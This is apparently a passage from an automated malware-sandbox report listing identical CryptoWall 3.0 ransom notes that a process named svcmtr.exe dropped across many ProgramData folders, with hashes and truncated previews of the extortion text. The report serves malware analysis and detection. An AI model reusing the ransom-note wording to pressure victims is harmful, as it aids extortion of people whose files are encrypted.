                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\RAC\Temp\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\RAC\Temp\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\RAC\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\RAC\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Search\Data\Temp\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Search\Data\Temp\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Search\Data\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Search\Data\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Search\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Search\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Vault\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Vault\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Windows Defender\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Windows Defender\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Windows NT\MSFax\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Windows NT\MSFax\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
